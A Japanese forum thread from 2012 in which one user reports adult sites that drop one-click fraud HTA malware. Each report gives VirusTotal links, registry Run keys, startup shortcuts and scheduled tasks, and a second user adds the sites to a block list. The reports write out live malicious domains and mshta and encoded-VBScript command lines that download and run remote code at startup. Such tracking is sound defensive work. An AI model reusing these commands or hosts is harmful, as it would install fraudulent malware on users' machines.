EROSTAR 投稿者：いぬ 投稿日：2012/01/30(Mon) 21:58 No.22771    ワンクリウェア入り http://qn515q.info/ File name 「 MovieID_diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.hta」 https://www.virustotal.com/file/544a64fe6cec8c723b3c48090b97a156e9f161f1a01b68bd380a315055d4cb8f/analysis/1327915764/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWritediHvYDyYQRvrDubXyHsSW4gHdc0xQYi2] C:\Users\Cerberus\SoftRecovery\datdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.bat O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe The link place of "RegWriting" C:\Windows\System32\mshta.exe http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 The link place of "SystemFile" C:\Users\Cerberus\UserProfile\mshost.exe http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&log=1 Startup on Registory HKCU:Run RegWritediHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 C:\Users\Cerberus\SoftRecovery\datdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.bat SystemBootdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe Task Scheduler librar」 RegWriting <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2</Arguments> SystemFile <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2</Arguments> ---------------------------------------------------------- http://rrinl58r.info/ File name 「MovieID_6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.hta」 https://www.virustotal.com/file/abea9c586fc93148dc75b5fdffadfca55e0b18d11615a72b1e926dc54f3b4a2f/analysis/1328011779/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWrite6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo] C:\Users\Cerberus\SoftRecovery\dat6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.bat O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe The link place of "RegWriting" C:\Windows\System32\mshta.exe http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo The link place of "SystemFile" C:\Users\Cerberus\UserProfile\mshost.exe http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&log=1 Startup on Registory HKCU:Run RegWrite6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo C:\Users\Cerberus\SoftRecovery\dat6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.bat HKCU:Run SystemBoot6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 RegWriting <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo</Arguments> SystemFile <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo</Arguments> アダルトマジック - いぬ 2012/01/30(Mon) 22:01 No.22772 ワンクリウェア入り http://naples.ban-ban-boin.com/ http://*.ban-ban-boin.com/ File name 「LoadMovie.hta」 https://www.virustotal.com/file/dbe00dd91abc3c1c59f67d1c26331044e23253006a593a683037e60e9521a2d1/analysis/ C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [TrackBaczCrpsh] "C:\Users\Cerberus\AppData\Roaming\Adobe\Crpsh.lnk" O4 - HKCU\..\Run: [dooain17062_464727204] "C:\Windows\system32\mshta" http://746e.ban-ban-boin.com/sd2nh3/SkHymOqXANnHdvm4tZnHbw.htm The link place of "Crpsh" "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe" //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Macromedia\Uploads745CIl.ttf" Startup on Registory HKCU:Run dooain17062_464727204 "C:\Windows\system32\mshta" http://746e.ban-ban-boin.com/sd2nh3/SkHymOqXANnHdvm4tZnHbw.htm HKCU:Run TrackBaczCrpsh "C:\Users\Cerberus\AppData\Roaming\Adobe\Crpsh.lnk" JPPorn - いぬ 2012/01/30(Mon) 22:04 No.22773 ワンクリウェア入り http://lollypop-porn.info/ File name 「MovieID_6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu.hta」 https://www.virustotal.com/file/181b0cbf26b86b99dc1cb48c239614b07422c6b2aaaf6f172c5f07009ae2664d/analysis/1327924889/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://lollypop-porn.info/set_inf2.php?cccid=6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu The link place of " SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://lollypop-porn.info/reg2.php?cccid=6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu Startup on Registory HKCU:Run RegWrite6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBoot6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://lollypop-porn.info/set_inf2.php?cccid=6trIIFquFO6rJkEf8DEIl3zFuX3Y3uQu</Arguments> Japanese Movies - いぬ 2012/01/31(Tue) 22:42 No.22774 ワンクリウェア入り http://riz29r.info/ File name 「MovieID_ 0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt.hta」 https://www.virustotal.com/file/924768169737547be94ba644732bb458717c68ffa47675cc166a3f368777ff4b/analysis/1328012143/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt] C:\Users\Cerberus\SoftRecovery\dat0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://riz29r.info/set_inf2.php?cccid=0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\mshost.exe http://riz29r.info/reg2.php?cccid=0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt&log=1 Startup on Registory HKCU:Run RegWrite0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt C:\Users\Cerberus\SoftRecovery\dat0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt.bat HKCU:Run SystemBoot0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library RegWrite <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://riz29r.info/set_inf2.php?cccid=0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt</Arguments> SystemBoot <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://riz29r.info/reg2.php?cccid=0lMASEV7XiwVlRwHBUMA4g7GtROCZoFt</Arguments> アダルトサイト - いぬ 2012/02/03(Fri) 21:05 No.22775 ワンクリウェア入り http://mnk.effectlayer.biz/ http://*.effectlayer.biz/ File name 「FlashMoviePlayer.hta」 https://www.virustotal.com/file/3203f292f8fcbb6b39454e86e9a050d14d23e5a883a335a520fa0bdf097817df/analysis/1328269389/ C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [GMDLSLanPojt] "C:\Users\Cerberus\AppData\Roaming\Adobe\LanPojt.lnk" O4 - HKCU\..\Run: [uranvs44879_799921408] "C:\Windows\system32\mshta" http://264d.effectlayer.biz/slcm2r4g/EXnrahbBIAWkgc3rXe71OA.htm The link place of "LanPojt" "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe" //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Identities\MalachiteyrIg.dic" Startup on Registory HKCU:Run GMDLSLanPojt "C:\Users\Cerberus\AppData\Roaming\Adobe\LanPojt.lnk" HKCU:Run uranvs44879_799921408 "C:\Windows\system32\mshta" http://264d.effectlayer.biz/slcm2r4g/EXnrahbBIAWkgc3rXe71OA.htm

Japanese Movies 投稿者：いぬ 投稿日：2012/01/22(Sun) 20:49 No.22763    ワンクリウェア入り http://bzin85b.info/ File name 「MovieID_JQwv8ppT2HNiZiFZQb8oWOMyHG6wrjfk.hta」 https://www.virustotal.com/file/f5518919afe6d8743a12667b9e3e79d464f301f464e2f0a8cad18e257e327f94/analysis/1327219800/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC] C:\Users\Cerberus\SoftRecovery\datSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\mshost.exe http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&log=1 Startup on Registory HKCU:Run RegWriteSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC C:\Users\Cerberus\SoftRecovery\datSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC.bat HKCU:Run SystemBootSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library RegWrite <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC</Arguments> Task Scheduler library SystemBoot <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC</Arguments> ---------------------------------------------------------- http://ink59di.info/ File name 「MovieID_kNZwPodBZ1pFSGnptoiDF7qMVj2DMUpz.hta」 https://www.virustotal.com/file/daafa3bc00d1e1b2f4d7f2a0fe659ac1aca4d45f087a36f0e230fcb82ce711b2/analysis/1327320142/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootzeb7zjtYnCMSZEU2mfdWr2513angqCQW] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWritezeb7zjtYnCMSZEU2mfdWr2513angqCQW] C:\Users\Cerberus\SoftRecovery\datzeb7zjtYnCMSZEU2mfdWr2513angqCQW.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\mshost.exe http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&log=1 Startup on Registory HKCU:Run RegWritezeb7zjtYnCMSZEU2mfdWr2513angqCQW C:\Users\Cerberus\SoftRecovery\datzeb7zjtYnCMSZEU2mfdWr2513angqCQW.bat HKCU:Run SystemBootzeb7zjtYnCMSZEU2mfdWr2513angqCQW C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library RegWrite <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW</Arguments> SystemBoot <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW</Arguments> アダルト館 - いぬ 2012/01/22(Sun) 20:51 No.22764 ワンクリウェア入り http://roar.dhufij.com/ http://dhufij.com/ http://*.dhufij.com/ File name 「peachbomb_1327229879.hta」 Kaspersky Trojan-Downloader.HTA.Agent.bu 20120122 https://www.virustotal.com/file/273c260a526528ab11732ae0b512bdda11b4a1513bcc48c62dbf8da1afca3b0d/analysis/1327229899/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [fruity_9ee84cd160c1440a11447ed87f262bec1ce6e18ce02d6488] C:\Users\Cerberus\AppData\Roaming\Microsoft\fruity_9ee84cd160c1440a11447ed87f262bec1ce6e18ce02d6488.vbs Startup on Registory HKCU:Run fruity_9ee84cd160c1440a11447ed87f262bec1ce6e18ce02d6488 C:\Users\Cerberus\AppData\Roaming\Microsoft\fruity_9ee84cd160c1440a11447ed87f262bec1ce6e18ce02d6488.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\fruity_9ee84cd160c1440a11447ed87f262bec1ce6e18ce02d6488.vbs</Command> アダルトサイト - いぬ 2012/01/22(Sun) 22:03 No.22765 ワンクリウェア入り http://s40.lemonlibrary.info/ http://vou.lemonlibrary.info/ http://*.lemonlibrary.info/ File name 「MoviePlayer.hta」 https://www.virustotal.com/file/da3ec1d76ec0bc96d2d27c58889097652316b410f892d2ba74eae58ad4c0d486/analysis/1327236554/ C:\Documents and Settings\ねこ王\Application Data\Adobe\wmMsgSvr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [SmartMedir FibrxChannel] "C:\Documents and Settings\ねこ王\Application Data\Macromedia\FibrxChannel" O4 - HKCU\..\Run: [ncptune28454_478762205] "C:\WINDOWS\system32\mshta" http://f9a9.lemonlibrary.info/q5/QFsprHK7LdPdsG832mhcgQ.htm The link place of "FibrxChannel" "C:\Documents and Settings\ねこ王\Application Data\Adobe\wmMsgSvr.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Macromedia\JasperKBI.bak" Startup on Registory HKCU:Run ncptune28454_478762205 "C:\WINDOWS\system32\mshta" http://f9a9.lemonlibrary.info/q5/QFsprHK7LdPdsG832mhcgQ.htm HKCU:Run SmartMedir FibrxChannel "C:\Documents and Settings\ねこ王\Application Data\Macromedia\FibrxChannel" --------------------------------------------------------- http://8pw.idolpolicy.info/ http://cs6.idolpolicy.info/ http://n2u.idolpolicy.info/ http://*.idolpolicy.info/ http://8pw.idolpolicy.info/ http://cs6.idolpolicy.info/ http://n2u.idolpolicy.info/ http://*.idolpolicy.info/ File name 「FlashMoviePlayer.hta」 https://www.virustotal.com/file/670c7ad84e1d0da68d38efcefcabf46023221710de9b569a4bfa60b152a3325a/analysis/1327495266/ C:\Documents and Settings\ねこ王\Application Data\Adobe\wmMsgSvr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [rLink RefBook] "C:\Documents and Settings\ねこ王\Application Data\Adobe\RefBook" O4 - HKCU\..\Run: [ncptune28454_478762205] "C:\WINDOWS\system32\mshta" http://b509.lemonlibrary.info/pve5rj0k/E2M-X1t2p0fklbx1ozvOXg.htm The link place of " RefBook" "C:\Documents and Settings\ねこ王\Application Data\Adobe\wmMsgSvr.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Adobe\citrinHjr" Startup on Registory HKCU:Run ncptune28454_478762205 "C:\WINDOWS\system32\mshta" http://b509.lemonlibrary.info/pve5rj0k/E2M-X1t2p0fklbx1ozvOXg.htm HKCU:Run rLink RefBook "C:\Documents and Settings\ねこ王\Application Data\Adobe\RefBook" ---------------------------------------------------------- http://6qi.enjoyplay.biz/ http://*.enjoyplay.biz/ File name 「FlvPlayer.hta」 https://www.virustotal.com/file/83c3ce30fb8aa577065a4bfe162205d15e81ce6d7eeca2b66d97514aa5e6759c/analysis/1327497175/ C:\Documents and Settings\ねこ王\Application Data\Identities\TosMsgAgt.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [GMPDS(Famicon)] "C:\Documents and Settings\ねこ王\Application Data\Adobe\Famicon" O4 - HKCU\..\Run: [ncptune28454_254211506] "C:\WINDOWS\system32\mshta" http://03e1.enjoyplay.biz/qw6/ZWyDH6YmLxq5saYep7w~YA.htm The link place of "Famicon" "C:\Documents and Settings\ねこ王\Application Data\Identities\TosMsgAgt.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Identities\Apatite425gyw.dic" Startup on Registory HKCU:Run GMPDS(Famicon) "C:\Documents and Settings\ねこ王\Application Data\Adobe\Famicon" HKCU:Run ncptune28454_254211506 "C:\WINDOWS\system32\mshta" http://03e1.enjoyplay.biz/qw6/ZWyDH6YmLxq5saYep7w~YA.htm -------------------------------------------------------- http://uru.dollbox.biz/ http://vgb.dollbox.biz/ http://*.dollbox.biz/ File name 「FlvPlayer.hta」 https://www.virustotal.com/file/d4090468d74681538cdbe01d3ff777e7664d20fec0a82a138ad00afb920a0cbd/analysis/1327503236/ C:\Documents and Settings\ねこ王\Application Data\Adobe\WscMgr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [OSIcodel optepon] "C:\Documents and Settings\ねこ王\Application Data\Identities\optepon" O4 - HKCU\..\Run: [ncptune28454_104607407] "C:\WINDOWS\system32\mshta" http://7e2a.dollbox.biz/qqm/VDDx89kfja6mk95fCqvjIQ.htm The link place of "optepon" "C:\Documents and Settings\ねこ王\Application Data\Adobe\WscMgr.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Macromedia\Jasper883mUf.ttf" Startup on Registory HKCU:Run ncptune28454_104607407 "C:\WINDOWS\system32\mshta" http://7e2a.dollbox.biz/qqm/VDDx89kfja6mk95fCqvjIQ.htm HKCU:Run OSIcodel optepon "C:\Documents and Settings\ねこ王\Application Data\Identities\optepon" Otakarasex.Info - いぬ 2012/01/23(Mon) 21:18 No.22766 ワンクリウェア入り http://cherry.otakarasex.info/ File name 「MobileMovie.hta」 https://www.virustotal.com/file/f6ddeb56974d80f1425759c5ece1d8920c099005e5928f933d38c4b8ecef6036/analysis/ C:\Documents and Settings\ねこ王\Application Data\Identities\WscMgr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [iDEAT(nervbus)] "C:\Documents and Settings\ねこ王\Application Data\Macromedia\nervbus" O4 - HKCU\..\Run: [cambus14092_209388203] "C:\WINDOWS\system32\mshta" http://b1fb.otakarasex.info/dr7a8x/-FsrRGq7ETMQ6MpQZsKmzw.htm The link place of "nervbus" "C:\Documents and Settings\ねこ王\Application Data\Identities\WscMgr.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Adobe\oath437bObU.cnf" Startup on Registory HKCU:Run cambus14092_209388203 "C:\WINDOWS\system32\mshta" http://b1fb.otakarasex.info/dr7a8x/-FsrRGq7ETMQ6MpQZsKmzw.htm HKCU:Run iDEAT(nervbus) "C:\Documents and Settings\ねこ王\Application Data\Macromedia\nervbus" ノーマルワンクリになってます。 - いぬ 2012/01/27(Fri) 21:41 No.22768 Website name「ADULT」 http://www.hydrangea-movies.com/ Website name「ADULT COLLECTION」 http://www.ageha-movie.com/ Website name「ADULT DREAM 」 http://www.holmes-channel.org/ 宝探し - いぬ 2012/01/27(Fri) 22:28 No.22769 ワンクリウェア入り http://www.net-tresurehants.com/ File name 「douga82735246.hta」 https://www.virustotal.com/file/40be2b4d59a276a2df0ae281e0332f40b190d0435a021750f4139242d00412d2/analysis/1327668834/ C:\Windows\System32\mshta.exe O4 - HKCU\..\Run: [webnetzn] mshta "C:\ProgramData\netzn\86XYMXV3.hta" Startup on Registory HKCU:Run webnetzn mshta "C:\ProgramData\netzn\86XYMXV3.hta" Re: Japanese Movies - 浦野 秀雄 2012/01/29(Sun) 19:37 No.22770 それぞれリストに入れました。

セックス動画EROS 投稿者：いぬ 投稿日：2012/01/17(Tue) 21:50 No.22755    ワンクリウェア入り http://ero-xx.com/ File name 「movie_load1326801154.hta」 http://r.virscan.org/report/305a26e3e9b7e959049df99042d7e8b5.html C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [WqbLogic radiuy] "C:\Users\Cerberus\AppData\Roaming\Adobe\radiuy.lnk" O4 - HKCU\..\Run: [granite] C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\granite\granite.hta" The link place of "radiuy" "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe" //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Adobe\ChalcedonyeKsD" Startup on Registory HKCU:Run granite C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\granite\granite.hta" HKCU:Run WqbLogic radiuy "C:\Users\Cerberus\AppData\Roaming\Adobe\radiuy.lnk" Movieotakara.Info - いぬ 2012/01/18(Wed) 20:33 No.22756 ワンクリウェア入り http://slate.movieotakara.info/ http://white.movieotakara.info/ http://*.movieotakara.info/ File name 「MobileMovie.hta」 https://www.virustotal.com/file/909585896226c40b9f42f54621a0565acdd079e350ce982aaa43f2aa91a8e884/analysis/1326876820/ C:\Documents and Settings\ねこ王\Application Data\Adobe\appMgr2.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [falm(Mybh)] "C:\Documents and Settings\ねこ王\Application Data\Macromedia\Mybh" O4 - HKCU\..\Run: [later31528_177627703] "C:\WINDOWS\system32\mshta" http://4f04.mountech.info/qu/DFR-Jrbg4TTAoyVQuxqaQw.htm The link place of "Mybh" "C:\Documents and Settings\ねこ王\Application Data\Adobe\appMgr2.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Macromedia\exactly931XEW.lck" Startup on Registory KCU:Run falm(Mybh) "C:\Documents and Settings\ねこ王\Application Data\Macromedia\Mybh" HKCU:Run later31528_177627703 "C:\WINDOWS\system32\mshta" http://4f04.mountech.info/qu/DFR-Jrbg4TTAoyVQuxqaQw.htm エロサイト - いぬ 2012/01/18(Wed) 20:35 No.22757 ワンクリウェア入り http://californium.sweeteromotion.net/ http://sweeteromotion.net/ http://*.sweeteromotion.net/ File name 「privacysex_1326882632.hta」 https://www.virustotal.com/file/69de30e75f10904d999c59b1b947670c1dd8d0d0ab34251ce5749889ca286605/analysis/1326882649/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [privateplay_420078196884c6ce1e3f22ecef8150a794e96feabeb67b42] C:\Users\Cerberus\AppData\Roaming\Identities\privateplay_420078196884c6ce1e3f22ecef8150a794e96feabeb67b42.vbs Startup on Registory HKCU:Run privateplay_420078196884c6ce1e3f22ecef8150a794e96feabeb67b42 C:\Users\Cerberus\AppData\Roaming\Identities\privateplay_420078196884c6ce1e3f22ecef8150a794e96feabeb67b42.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Identities\privateplay_420078196884c6ce1e3f22ecef8150a794e96feabeb67b42.vbs</Command> ADULT SITE - いぬ 2012/01/18(Wed) 20:37 No.22758 ワンクリウェア入り http://ethics.plumuramura.net/ http://plumuramura.net/ http://*.plumuramura.net/ File name 「stripemovie_1326884046.hta」 https://www.virustotal.com/file/4a18d0054ea5473f532c04f9a3d9d326f0d8e5a79d962f71dc1092adeb4164a0/analysis/1326884066/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [oppapurin_61de03032467844c08d02cf8412337035b27ecc44dc01965] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\oppapurin_61de03032467844c08d02cf8412337035b27ecc44dc01965.vbs Startup on Registory HKCU:Run oppapurin_61de03032467844c08d02cf8412337035b27ecc44dc01965 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\oppapurin_61de03032467844c08d02cf8412337035b27ecc44dc01965.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\oppapurin_61de03032467844c08d02cf8412337035b27ecc44dc01965.vbs</Arguments> ADULT COLLECTION - いぬ 2012/01/19(Thu) 21:07 No.22759 ワンクリウェア入り http://www.ageha-movie.com/ File name 「2d66.hta」 https://www.virustotal.com/file/f123ff695b3fe9d08a184284cbf59d80af733b49a45cc1fdf9875b95fbbc862b/analysis/1326961960/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta http://www.ageha-movie.com/regist2.php アダルトサイト - いぬ 2012/01/19(Thu) 21:53 No.22760 ワンクリウェア入り http://uta.blackday.org/ http://*.blackday.org/ File name 「MoviePlayer.hta」 https://www.virustotal.com/file/a80a494d389ddbdc57cc478e59ed3557b37816913307239ef000d271c35f9ecb/analysis/1326976666/ C:\Documents and Settings\ねこ王\Application Data\Identities\TosMsgAgt.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [QebLogic illustrqtor] "C:\Documents and Settings\ねこ王\Application Data\Adobe\illustrqtor" O4 - HKCU\..\Run: [Merihant47481_368576503] "C:\WINDOWS\system32\mshta" http://c1f2.startuppage.biz/a245bunm/X~X9Hi7hzzCAGZuNk2e5BQ.htm The link place of "illustrqtor" "C:\Documents and Settings\ねこ王\Application Data\Identities\TosMsgAgt.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Adobe\AzuriteNdVR" Startup on Registory」 HKCU:Run Merihant47481_368576503 "C:\WINDOWS\system32\mshta" http://5d7e.startuppage.biz/sy8rw/rN9aI068PoYIImo6p3wFAw.htm KCU:Run QebLogic illustrqtor "C:\Documents and Settings\ねこ王\Application Data\Adobe\illustrqtor" アダルトサイト - いぬ 2012/01/20(Fri) 21:31 No.22761 ワンクリウェア入り http://w7l.001file.info/ http://7mv.001file.info/ http://mdw.001file.info/ http://zkt.001file.info/ http://*.001file.info/ File name 「MoviePlayer.hta」 https://www.virustotal.com/file/597f1b9b0aea1eefe75b3f7fea01167eab3bcf0475bef943425ab3c8196338d5/analysis/1327055398/ C:\Documents and Settings\ねこ王\Application Data\Macromedia\TosMsgAgt.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [VxWVRKSiliustrator] "C:\Documents and Settings\ねこ王\Application Data\Adobe\iliustrator" O4 - HKCU\..\Run: [Merihant47481_696663905] "C:\WINDOWS\system32\mshta" http://51c5.blackday.org/qjh/sBCDt1dRxG8jKVbyp9lgZA.htm The link place of "illustrqtor" "C:\Documents and Settings\ねこ王\Application Data\Macromedia\TosMsgAgt.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Identities\ScoleciteFoIe.dic" Startup on Registory HKCU:Run Merihant47481_696663905 "C:\WINDOWS\system32\mshta" http://51c5.blackday.org/qjh/sBCDt1dRxG8jKVbyp9lgZA.htm HKCU:Run VxWVRKSiliustrator "C:\Documents and Settings\ねこ王\Application Data\Adobe\iliustrator" Re: セックス動画EROS - 浦野 秀雄 2012/01/22(Sun) 17:18 No.22762 それぞれリストに入れました。

WMV 投稿者：いぬ 投稿日：2012/01/08(Sun) 19:46 No.22731    ワンクリウェア入り http://virtuoso.nebulanikki.net/ http://nebulanikki.net/ http://*.nebulanikki.net/ File name 「candygirl_1325973169.hta」 http://www.virustotal.com/file-scan/report.html?id=5f7846dad30c10f9a9ee8b555307aa48ac999152468bf6c562d575a8dd6c2a49-1325972821 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d] C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs Startup on Registory HKCU:Run breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs</Command> --------------------------------------------------------- http://upheld.yorkshirejulie.net/ http://yorkshirejulie.net/ http://*.yorkshirejulie.net/ File name 「smsister_1326370947.hta」 